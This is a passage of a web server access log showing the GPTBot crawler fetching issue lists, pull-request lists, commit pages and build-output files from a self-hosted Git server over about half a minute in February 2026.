192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35718] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35746] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12790] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35752] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35753] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fxref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 23954] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fxref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 23958] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fxref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 23976] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11227] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:19:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11233] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 21777] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:19:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 